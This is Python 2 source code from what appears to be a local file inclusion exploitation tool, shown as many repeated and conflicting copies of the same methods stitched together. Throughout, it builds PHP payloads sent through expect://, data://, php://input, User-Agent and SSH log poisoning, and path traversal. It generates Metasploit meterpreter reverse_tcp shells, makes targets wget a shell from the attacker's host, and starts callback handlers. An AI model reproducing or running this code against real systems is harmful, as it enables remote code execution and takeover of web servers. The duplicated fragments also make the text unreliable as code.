def execute_expect(self):
lhost, lport, shell = msf_payload()
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
# Build payload
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload = 'expect://echo "'
payload += quote_plus(payload_file.read().replace('"', '\\"').replace("$", "\\$"))
payload += '" | php'
payload_file.close()
progressbar()
else:
payload = 'expect://echo "' + stager_payload.format(lhost, shell) + '" | php'
print (t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell)
print (t.green(" [*] ") + "Downloading Shell")
progressbar()
lfi = self.target + payload
raw_input(t.blue(" [!] ") + "Press Enter To Continue When Your Metasploit Handler is Running ...")
try:
r = requests.get(lfi)
if r.status_code != 200:
print (t.red(" [!] Unexpected HTTP Response "))
sys.exit(1)
except requests.exceptions.RequestException as expect_error:
print t.red(" [!] HTTP Error ")(expect_error)
def execute_logs(self):
lhost, lport, shell = msf_payload()
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload = "<?php eval(base64_decode('{0}')); ?>".format(
payload_file.read().encode("base64").replace("\n", "")
)
payload_file.close()
progressbar()
else:
payload = stager_payload.format(lhost, shell)
print (t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell)
print (t.green(" [*] ") + "Downloading Shell")
progressbar()
lfi = self.target + self.location
raw_input(t.blue(" [!] ") + "Press Enter To Continue When Your Metasploit Handler is Running ...")
try:
headers = {"User-Agent": payload}
r = requests.get(lfi, headers=headers)
if r.status_code != 200:
print (t.red(" [!] Unexpected HTTP Response "))
else:
r = requests.get(lfi) # pull down shell from poisoned logs
if r.status_code != 200:
print (t.red(" [!] Unexpected HTTP Response "))
except requests.exceptions.RequestException as access_error:
print t.red(" [!] HTTP Error ")(access_error)
def execute_ssh(self):
lhost, lport, shell = msf_payload()
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
payload_file = open('/tmp/{0}.php'.format(shell), 'r')
payload_stage2 = quote_plus(payload_file.read())
payload_file.close()
payload = "<?php eval(\\$_GET['code'])?>"
print(
t.blue(" [!] ") +
"Enter fake passwords to perform SSH log poisoning...")
host = urlparse.urlsplit(self.target).netloc
system('/usr/bin/ssh "{0}@{1}"'.format(payload, host))
print(
t.red(" [!] ") + "Payload Is Located At: " +
t.red("/tmp/{0}.php")).format(shell)
print(t.green(" [*] ") + "Downloading Shell")
progressbar()
lfi = self.target + self.location + '&code={0}'.format(payload_stage2)
try:
r = requests.get(lfi) # pull down shell from poisoned logs
if r.status_code != 200:
print(t.red(" [!] Unexpected HTTP Response "))
except requests.exceptions.RequestException as access_error:
print t.red(" [!] HTTP Error ")(access_error)
def execute_ssh(self):
lhost, lport, shell = msf_payload()
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload_stage2 = quote_plus(payload_file.read())
payload_file.close()
payload = "<?php eval(\\$_GET['code'])?>"
print (t.blue(" [!] ") + "Enter fake passwords to perform SSH log poisoning...")
host = urlparse.urlsplit(self.target).netloc
system('/usr/bin/ssh "{0}@{1}"'.format(payload, host))
print (t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell)
print (t.green(" [*] ") + "Downloading Shell")
progressbar()
lfi = self.target + self.location + "&code={0}".format(payload_stage2)
try:
r = requests.get(lfi) # pull down shell from poisoned logs
if r.status_code != 200:
print (t.red(" [!] Unexpected HTTP Response "))
except requests.exceptions.RequestException as access_error:
print t.red(" [!] HTTP Error ")(access_error)
def execute_input(self):
lhost, lport, shell = msf_payload()
""" Build payload """
wrapper = "php://input"
url = self.target + wrapper
""" Handle staging """
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload = payload_file.read()
payload_file.close()
else:
payload = stager_payload.format(lhost, shell)
handle = Payload(lhost, lport)
handle.handler()
if self.nostager:
progressbar()
else:
print(t.cyan("[{0}] ".format(datetime.datetime.now())) + "Starting Web Server ... ")
progressbar()
try:
subprocess.Popen(['python http_server.py'], shell=True)
except OSError as os_error:
print(t.red("[{0}] ".format(datetime.datetime.now()) + "Process Error"))(os_error)
raw_input(t.cyan("[{0}] ".format(
datetime.datetime.now())) + "Press Enter To Continue When Your Metasploit Handler Is Running ...")
""" Handle cookies """
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
input_request = requests.post(url, data=payload, cookies=f_cookies)
if input_request.status_code != 200:
print t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now()))
sys.exit(1)
else:
sys.exit(0)
except requests.HTTPError as input_error:
print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(input_error)
sys.exit(1)
else:
try:
input_request = requests.post(url, data=payload)
if input_request.status_code != 200:
print t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now()))
sys.exit(1)
else:
sys.exit(0)
except requests.HTTPError as input_error:
print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(input_error)
sys.exit(1)
def execute_ssh(self):
lhost, lport, shell = msf_payload()
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
payload_file = open('/tmp/{0}.php'.format(shell),'r')
payload_stage2 = quote_plus(payload_file.read())
payload_file.close()
payload = "<?php eval(\\$_GET['code'])?>"
print(t.blue(" [!] ") + "Enter fake passwords to perform SSH log poisoning ...")
host = urlparse.urlsplit(self.target).netloc
system('/usr/bin/ssh "{0}@{1}"'.format(payload, host))
print(t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell)
print(t.green(" [*] ") + "Executing Shell")
progressbar()
""" Attempt traverse """
if not self.relative:
lfi = self.target + self.location + '&code={0}'.format(payload_stage2)
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
r = requests.get(lfi, cookies=f_cookies)
if r.status_code != 200:
print(t.red(" [!] Unexpected HTTP Response "))
except requests.exceptions.RequestException as access_error:
print t.red(" [!] HTTP Error ")(access_error)
else:
try:
r = requests.get(lfi)
if r.status_code != 200:
print(t.red(" [!] Unexpected HTTP Response "))
except requests.exceptions.RequestException as access_error:
print t.red(" [!] HTTP Error ")(access_error)
else:
for path_traversal_sequence in path_traversal_sequences:
for counter in xrange(10):
lfi = self.target + path_traversal_sequence*counter + self.location + '&code={0}'.format(payload_stage2)
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
r = requests.get(lfi, cookies=f_cookies)
if r.status_code != 200:
print(t.red(" [!] Unexpected HTTP Response "))
except requests.exceptions.RequestException as access_error:
print t.red(" [!] HTTP Error ")(access_error)
else:
try:
r = requests.get(lfi)
if r.status_code != 200:
print(t.red(" [!] Unexpected HTTP Response "))
except requests.exceptions.RequestException as access_error:
print t.red(" [!] HTTP Error ")(access_error)
def execute_data(self):
# Arguments needed for Meterpreter
lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")
# Generate random shell name
g = Generator()
shell = g.generate()
# Build payload
payload = "<?php system('wget http://{0}:8000/{1}.php'); ?>".format(lhost, shell)
encoded_payload = payload.encode('base64')
# Build data wrapper
data_wrapper = "data://text/html;base64,{0}".format(encoded_payload)
lfi = self.target + data_wrapper
print(t.green(" [*] ") + "Generating Data Wrapper")
progressbar()
print(t.red(" [!] ") + "Success!")
print(t.green(" [*] ") + "Generating Metasploit Payload")
progressbar()
# msfpayload arguments
php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)
# Generate shell
msf = subprocess.Popen(php, shell=True)
msf.wait()
# Make sure payload was generated correctly
if msf.returncode != 0:
print(t.red(" [!] ") + "Error Generating MSF Payload ")
else:
print(t.red(" [!] ") + "Success! ")
print(t.red(" [!] ") + "Payload Is Located At: /tmp/{0}.php").format(shell)
# Assuming if there is a server running on port 8000 hosting from /tmp
print(t.red(" [!] ") + "Is Your Server Running?")
print(t.yellow(" [*] ") + "To Launch Server: http-server /tmp -p 8000")
print(t.green(" [*] ") + "Downloading Shell")
progressbar()
# LFI payload that downloads the shell
data_request = requests.get(lfi)
# Try block for actual attack
try:
if data_request.status_code != 200:
print(t.red(" [!] ") + "Unexpected HTTP Response ")
else:
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
except requests.exceptions.RequestException as data_error:
print(t.red(" [!] ") + "HTTP Error: %s" % data_error)
def execute_expect(self):
lhost, lport, shell = msf_payload()
handle = Payload(lhost, lport)
handle.handler()
""" Build payload """
""" Handle staging """
if self.nostager:
print(t.cyan("[{0}] ".format(datetime.datetime.now())) + "No-Staged Selected!")
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload = "expect://echo \""
payload += quote_plus(payload_file.read().replace("\"", "\\\"").replace("$", "\\$"))
payload += "\" | php"
payload_file.close()
else:
payload = "expect://echo \"" + stager_payload.format(lhost, shell) + "\" | php"
print(t.cyan("[{0}] ".format(datetime.datetime.now())) + "Starting Web Server ... ")
progressbar()
try:
p = subprocess.Popen(['python http_server.py'], shell=True, stdout=subprocess.PIPE)
p.communicate()
except OSError as os_error:
print(t.red("[{0}] ".format(datetime.datetime.now()) + "Process Error"))(os_error)
lfi = self.target + payload
raw_input(t.cyan("[{0}] ".format(
datetime.datetime.now())) + "Press Enter To Continue When Your Metasploit Handler is Running ...")
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
r = requests.get(lfi, cookies=f_cookies)
if r.status_code != 200:
print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
sys.exit(1)
else:
sys.exit(0)
except requests.HTTPError as expect_error:
print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(expect_error)
sys.exit(1)
else:
try:
r = requests.get(lfi)
if r.status_code != 200:
print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
sys.exit(1)
else:
sys.exit(0)
except requests.HTTPError as expect_error:
print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(expect_error)
sys.exit(1)
def execute_logs(self):
# Arguments for Meterpreter
lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")
# Generate random shell name
g = Generator()
shell = g.generate()
print(t.green(" [*] ") + "Generating Payload")
progressbar()
print(t.red(" [!] ") + "Success!")
print(t.green(" [*] ") + "Generating Metasploit Payload")
progressbar()
# Generate PHP shell
php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)
msf = subprocess.Popen(php, shell=True)
msf.wait()
# Handle Metasploit error codes
if msf.returncode != 0:
print(t.red(" [!] Error Generating MSF Payload "))
else:
print(t.green(" [*] ") + "Success!")
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell),"r")
payload = "<?php eval(base64_decode('{0}')); ?>".format(payload_file.read().encode('base64').replace("\n",""))
payload_file.close()
raw_input(t.green(" [!] ") + "Press enter to continue when your metasploit handler is running...")
else:
payload = "<?php system('wget http://{0}:8000/{1}.php') ?>".format(lhost, shell)
print(t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell)
print(t.green(" [*] ") + "Downloading Shell")
progressbar()
lfi = self.target + self.location
try:
headers = {'User-Agent': payload}
r = requests.get(lfi, headers=headers)
if r.status_code != 200:
print(t.red(" [!] Unexpected HTTP Response "))
else:
r = requests.get(lfi) # pull down shell from poisoned logs
if r.status_code != 200:
print(t.red(" [!] Unexpected HTTP Response "))
except requests.exceptions.RequestException as expect_error:
print t.red(" [!] HTTP Error ")(expect_error)
def execute_data(self):
lhost, lport, shell = msf_payload()
""" Build payload """
""" Handle staging """
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload = payload_file.read()
payload_file.close()
else:
payload = stager_payload.format(lhost, shell)
encoded_payload = quote_plus(payload.encode('base64'))
""" Build data wrapper """
data_wrapper = "data://text/html;base64,{0}".format(encoded_payload)
lfi = self.target + data_wrapper
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
if self.nostager:
progressbar()
else:
print(t.red(" [!] ") + "Is Your Server Running?")
print(t.yellow(" [*] ") + "To Launch Server: http-server /tmp -p 8000")
print(t.green(" [*] ") + "Downloading Shell")
progressbar()
raw_input(t.blue(" [!] ") + "Press Enter To Continue When Your Metasploit Handler is Running ...")
""" LFI payload that downloads the shell with try block for actual
attack """
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
data_request = requests.get(lfi, cookies=f_cookies)
if data_request.status_code != 200:
print(t.red(" [!] ") + "Unexpected HTTP Response ")
sys.exit(1)
except requests.exceptions.RequestException as data_error:
print(t.red(" [!] ") + "HTTP Error")(data_error)
else:
try:
data_request = requests.get(lfi)
if data_request.status_code != 200:
print(t.red(" [!] ") + "Unexpected HTTP Response ")
sys.exit(1)
except requests.exceptions.RequestException as data_error:
print(t.red(" [!] ") + "HTTP Error")(data_error)
def execute_expect(self):
# Arguments for Meterpreter
lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")
# Generate random shell name
g = Generator()
shell = g.generate()
print(t.green(" [*] ") + "Generating Payload")
progressbar()
print(t.red(" [!] ") + "Success!")
print(t.green(" [*] ") + "Generating Metasploit Payload")
progressbar()
# Generate PHP shell
php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)
msf = subprocess.Popen(php, shell=True)
msf.wait()
# Handle Metasploit error codes
if msf.returncode != 0:
print(t.red(" [!] Error Generating MSF Payload "))
else:
print(t.green(" [*] ") + "Success!")
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
# Build payload
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell),"r")
payload = "expect://echo \""
payload += quote_plus(payload_file.read().replace("\"","\\\"").replace("$","\\$"))
payload += "\" | php"
payload_file.close()
raw_input(t.green(" [!] ") + "Press enter to continue when your metasploit handler is running...")
else:
payload = "expect://wget http://{0}:8000/{1}.php".format(lhost, shell)
print(t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell)
print(t.green(" [*] ") + "Downloading Shell")
progressbar()
lfi = self.target + payload
try:
r = requests.get(lfi)
if r.status_code != 200:
print(t.red(" [!] Unexpected HTTP Response "))
except requests.exceptions.RequestException as expect_error:
print t.red(" [!] HTTP Error ") (expect_error)
def execute_input(self):
lhost, lport, shell = msf_payload()
""" Build payload """
wrapper = "php://input"
url = self.target + wrapper
""" Handle staging """
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload = payload_file.read()
payload_file.close()
else:
payload = stager_payload.format(lhost, shell)
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
if self.nostager:
progressbar()
else:
print(t.red(" [!] ") + "Is Your Server Running?")
print(t.yellow(" [*] ") + "To Launch Server: http-server /tmp -p 8000")
print(t.green(" [*] ") + "Downloading Shell")
progressbar()
raw_input(t.blue(" [!] ") + "Press Enter To Continue When Your Metasploit Handler Is Running ...")
""" Handle cookies """
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
input_request = requests.post(url, data=payload, cookies=f_cookies)
if input_request.status_code != 200:
print t.red(" [*] Unexpected HTTP Response ")
sys.exit(1)
except requests.exceptions.RequestException as input_error:
print t.red(" [*] HTTP Error ")(input_error)
else:
try:
input_request = requests.post(url, data=payload)
if input_request.status_code != 200:
print t.red(" [*] Unexpected HTTP Response ")
sys.exit(1)
except requests.exceptions.RequestException as input_error:
print t.red(" [*] HTTP Error ")(input_error)
def execute_input(self):
# Arguments needed for Meterpreter
lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")
# Generate random shell name
g = Generator()
shell = g.generate()
# Build php payload
wrapper = "php://input"
url = self.target + wrapper
payload = "<?php system('wget http://%s:8000/{0}.php'); ?>".format(shell)
print(t.green(" [*] ") + "Generating Data Wrapper")
progressbar()
print(t.red(" [!] ") + "Success!")
print t.green(" [*] ") + "Generating Metasploit Payload"
progressbar()
# Generate PHP shell
php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)
msf = subprocess.Popen(php, shell=True)
msf.wait()
# Handle Metasploit error codes
if msf.returncode != 0:
print(t.red(" [!] Error Generating MSF Payload "))
else:
print(t.green(" [*] ") + "Success!")
print(t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell)
print(t.green(" [*] ") + "Downloading Shell")
progressbar()
# Try block for actual attack
try:
dr = requests.post(url, data=payload)
if dr.status_code != 200:
print t.red(" [*] Unexpected HTTP Response ")
else:
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
except requests.exceptions.RequestException as input_error:
print t.red(" [*] HTTP Error ") + str(input_error)
def execute_data(self):
lhost, lport, shell = msf_payload()
# Build payload
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload = payload_file.read()
payload_file.close()
else:
payload = stager_payload.format(lhost, shell)
encoded_payload = quote_plus(payload.encode('base64'))
# Build data wrapper
data_wrapper = "data://text/html;base64,{0}".format(encoded_payload)
lfi = self.target + data_wrapper
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
if self.nostager:
progressbar()
else:
# Assuming if there is a server running on port 8000 hosting from /tmp
print(t.red(" [!] ") + "Is Your Server Running?")
print(
t.yellow(" [*] ") +
"To Launch Server: http-server /tmp -p 8000")
print(t.green(" [*] ") + "Downloading Shell")
progressbar()
raw_input(
t.blue(" [!] ") +
"Press Enter To Continue When Your Metasploit Handler is Running ..."
)
# LFI payload that downloads the shell
data_request = requests.get(lfi)
# Try block for actual attack
try:
if data_request.status_code != 200:
print(t.red(" [!] ") + "Unexpected HTTP Response ")
sys.exit(1)
except requests.exceptions.RequestException as data_error:
print(t.red(" [!] ") + "HTTP Error")(data_error)
def execute_expect(self):
# Arguments for Meterpreter
lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")
# Generate random shell name
g = Generator()
shell = g.generate()
# Build payload
payload = "expect://wget http://{0}:8000/{1}.php".format(lhost, shell)
lfi = self.target + payload
print(t.green(" [*] ") + "Generating Payload")
progressbar()
print(t.red(" [!] ") + "Success!")
print(t.green(" [*] ") + "Generating Metasploit Payload")
progressbar()
# Generate PHP shell
php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)
msf = subprocess.Popen(php, shell=True)
msf.wait()
# Handle Metasploit error codes
if msf.returncode != 0:
print(t.red(" [!] Error Generating MSF Payload "))
else:
print(t.green(" [*] ") + "Success!")
print(t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell)
print(t.green(" [*] ") + "Downloading Shell")
progressbar()
ir = requests.get(lfi)
try:
if ir.status_code != 200:
print(t.red(" [!] Unexpected HTTP Response "))
else:
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
except requests.exceptions.RequestException as expect_error:
print t.red(" [!] HTTP Error ") (expect_error)
def execute_input(self):
lhost, lport, shell = msf_payload()
# Build php payload
wrapper = "php://input"
url = self.target + wrapper
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload = payload_file.read()
payload_file.close()
else:
payload = stager_payload.format(lhost, shell)
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
if self.nostager:
progressbar()
else:
# Assuming if there is a server running on port 8000 hosting from /tmp
print(t.red(" [!] ") + "Is Your Server Running?")
print(
t.yellow(" [*] ") +
"To Launch Server: http-server /tmp -p 8000")
print(t.green(" [*] ") + "Downloading Shell")
progressbar()
raw_input(
t.blue(" [!] ") +
"Press Enter To Continue When Your Metasploit Handler Is Running ..."
)
try:
dr = requests.post(url, data=payload)
if dr.status_code != 200:
print t.red(" [*] Unexpected HTTP Response ")
sys.exit(1)
except requests.exceptions.RequestException as input_error:
print t.red(" [*] HTTP Error ")(input_error)
def execute_expect(self):
lhost, lport, shell = msf_payload()
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
# Build payload
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload = "expect://echo \""
payload += quote_plus(payload_file.read().replace("\"",
"\\\"").replace(
"$", "\\$"))
payload += "\" | php"
payload_file.close()
progressbar()
else:
payload = "expect://echo \"" + stager_payload.format(
lhost, shell) + "\" | php"
print(
t.red(" [!] ") + "Payload Is Located At: " +
t.red("/tmp/{0}.php")).format(shell)
print(t.green(" [*] ") + "Downloading Shell")
progressbar()
lfi = self.target + payload
raw_input(
t.blue(" [!] ") +
"Press Enter To Continue When Your Metasploit Handler is Running ..."
)
try:
r = requests.get(lfi)
if r.status_code != 200:
print(t.red(" [!] Unexpected HTTP Response "))
sys.exit(1)
except requests.exceptions.RequestException as expect_error:
print t.red(" [!] HTTP Error ")(expect_error)
def execute_logs(self):
lhost, lport, shell = msf_payload()
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload = "<?php eval(base64_decode('{0}')); ?>".format(
payload_file.read().encode('base64').replace("\n", ""))
payload_file.close()
progressbar()
else:
payload = stager_payload.format(lhost, shell)
print(
t.red(" [!] ") + "Payload Is Located At: " +
t.red("/tmp/{0}.php")).format(shell)
print(t.green(" [*] ") + "Downloading Shell")
progressbar()
lfi = self.target + self.location
raw_input(
t.blue(" [!] ") +
"Press Enter To Continue When Your Metasploit Handler is Running ..."
)
try:
headers = {'User-Agent': payload}
r = requests.get(lfi, headers=headers)
if r.status_code != 200:
print(t.red(" [!] Unexpected HTTP Response "))
else:
r = requests.get(lfi) # pull down shell from poisoned logs
if r.status_code != 200:
print(t.red(" [!] Unexpected HTTP Response "))
except requests.exceptions.RequestException as access_error:
print t.red(" [!] HTTP Error ")(access_error)
def execute_input(self):
lhost, lport, shell = msf_payload()
# Build php payload
wrapper = "php://input"
url = self.target + wrapper
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload = payload_file.read()
payload_file.close()
else:
payload = stager_payload.format(lhost, shell)
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
if self.nostager:
progressbar()
else:
# Assuming if there is a server running on port 8000 hosting from /tmp
print (t.red(" [!] ") + "Is Your Server Running?")
print (t.yellow(" [*] ") + "To Launch Server: http-server /tmp -p 8000")
print (t.green(" [*] ") + "Downloading Shell")
progressbar()
raw_input(t.blue(" [!] ") + "Press Enter To Continue When Your Metasploit Handler Is Running ...")
try:
dr = requests.post(url, data=payload)
if dr.status_code != 200:
print t.red(" [*] Unexpected HTTP Response ")
sys.exit(1)
except requests.exceptions.RequestException as input_error:
print t.red(" [*] HTTP Error ")(input_error)
def execute_data(self):
# Arguments needed for Meterpreter
lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")
# Generate random shell name
g = Generator()
shell = g.generate()
print(t.green(" [*] ") + "Generating Data Wrapper")
progressbar()
print(t.red(" [!] ") + "Success!")
print(t.green(" [*] ") + "Generating Metasploit Payload")
progressbar()
# msfpayload arguments
php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)
# Generate shell
msf = subprocess.Popen(php, shell=True)
msf.wait()
# Make sure payload was generated correctly
if msf.returncode != 0:
print(t.red(" [!] ") + "Error Generating MSF Payload ")
else:
print(t.red(" [!] ") + "Success! ")
print(t.red(" [!] ") + "Payload Is Located At: /tmp/{0}.php").format(shell)
# Build payload
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell),"r")
payload = payload_file.read()
payload_file.close()
else:
payload = "<?php system('wget http://{0}:8000/{1}.php'); ?>".format(lhost, shell)
encoded_payload = quote_plus(payload.encode('base64'))
# Build data wrapper
data_wrapper = "data://text/html;base64,{0}".format(encoded_payload)
lfi = self.target + data_wrapper
handle = Payload(lhost, lport, self.target, shell)
handle.handler()
if self.nostager:
raw_input(t.green(" [!] ") + "Press enter to continue when your metasploit handler is running...")
else:
# Assuming if there is a server running on port 8000 hosting from /tmp
print(t.red(" [!] ") + "Is Your Server Running?")
print(t.yellow(" [*] ") + "To Launch Server: http-server /tmp -p 8000")
print(t.green(" [*] ") + "Downloading Shell")
progressbar()
# LFI payload that downloads the shell
data_request = requests.get(lfi)
# Try block for actual attack
try:
if data_request.status_code != 200:
print(t.red(" [!] ") + "Unexpected HTTP Response ")
except requests.exceptions.RequestException as data_error:
print(t.red(" [!] ") + "HTTP Error: %s" % data_error)
def execute_ssh(self):
lhost, lport, shell = msf_payload()
handle = Payload(lhost, lport)
handle.handler()
payload_file = open('/tmp/{0}.php'.format(shell), 'r')
payload_stage2 = quote_plus(payload_file.read())
payload_file.close()
payload = "<?php eval(\\$_GET['code'])?>"
print(t.cyan("[{0}] ".format(datetime.datetime.now())) + "Start SSH Log Poisoning ..." + "\n")
host = urlparse.urlsplit(self.target).netloc
system('/usr/bin/ssh "{0}@{1}"'.format(payload, host))
print("\n")
print(t.red("[{0}] ".format(datetime.datetime.now())) + "Executing Shell!")
""" Attempt traverse """
if not self.relative:
lfi = self.target + self.location + '&code={0}'.format(payload_stage2)
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
r = requests.get(lfi, cookies=f_cookies)
if r.status_code != 200:
print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
except requests.HTTPError as access_error:
print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(access_error)
else:
try:
r = requests.get(lfi)
if r.status_code != 200:
print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
except requests.HTTPError as access_error:
print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(access_error)
else:
for path_traversal_sequence in path_traversal_sequences:
for counter in xrange(10):
lfi = self.target + path_traversal_sequence * counter + self.location + '&code={0}'.format(
payload_stage2)
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
r = requests.get(lfi, cookies=f_cookies)
if r.status_code != 200:
print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
sys.exit(1)
else:
sys.exit(0)
except requests.HTTPError as access_error:
print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(access_error)
sys.exit(1)
else:
try:
r = requests.get(lfi)
if r.status_code != 200:
print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
sys.exit(1)
else:
sys.exit(0)
except requests.HTTPError as access_error:
print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(access_error)
sys.exit(1)
def execute_environ(self):
lhost, lport, shell = msf_payload()
handle = Payload(lhost, lport)
handle.handler()
""" Handle staging """
if self.nostager:
print(t.cyan("[{0}] ".format(datetime.datetime.now())) + "No-Staged Selected!")
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload = "<?php eval(base64_decode('{0}')); ?>".format(
payload_file.read().encode('base64').replace("\n", ""))
payload_file.close()
else:
payload = stager_payload.format(lhost, shell)
progressbar()
try:
p = subprocess.Popen(['python http_server.py'], shell=True, stdout=subprocess.PIPE)
p.communicate()
except OSError as os_error:
print(t.red("[{0}] ".format(datetime.datetime.now()) + "Process Error"))(os_error)
""" Build LFI """
lfi = self.target + self.location
headers = {'User-Agent': payload}
raw_input(t.cyan(
"[{0}] ".format(datetime.datetime)) + "Press Enter To Continue When Your Metasploit Handler is Running ...")
try:
if not self.relative:
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
r = requests.get(lfi, headers=headers, cookies=f_cookies)
if r.status_code != 200:
print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
sys.exit(1)
else:
sys.exit(0)
except requests.RequestException as access_error:
print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(access_error)
sys.exit(1)
else:
try:
r = requests.get(lfi, headers=headers)
if r.status_code != 200:
print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
sys.exit(1)
else:
sys.exit(0)
except requests.RequestException as access_error:
print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(access_error)
sys.exit(1)
else:
for path_traversal_sequence in path_traversal_sequences:
for counter in xrange(10):
lfi = self.target + path_traversal_sequence * counter + self.location
if self.cookies:
f_cookies = format_cookies(self.cookies)
try:
r = requests.get(lfi, headers=headers, cookies=f_cookies)
if r.status_code != 200:
print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
sys.exit(1)
else:
sys.exit(0)
except requests.RequestException as access_error:
print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(access_error)
sys.exit(1)
else:
try:
r = requests.get(lfi, headers=headers)
if r.status_code != 200:
print(t.red("[{0}] Unexpected HTTP Response ".format(datetime.datetime.now())))
sys.exit(1)
else:
sys.exit(0)
except requests.RequestException as access_error:
print t.red("[{0}] HTTP Error ".format(datetime.datetime.now()))(access_error)
sys.exit(1)
except Exception as unknown_error:
print t.red("[{0}] Unknown Error ".format(datetime.datetime.now()))(unknown_error)
sys.exit(1)
def execute_data(self):
lhost, lport, shell = msf_payload()
""" Build payload """
""" Handle staging """
if self.nostager:
payload_file = open("/tmp/{0}.php".format(shell), "r")
payload = payload_file.read()
payload_file.close()
else:
payload = stager_payload.format(lhost, shell)
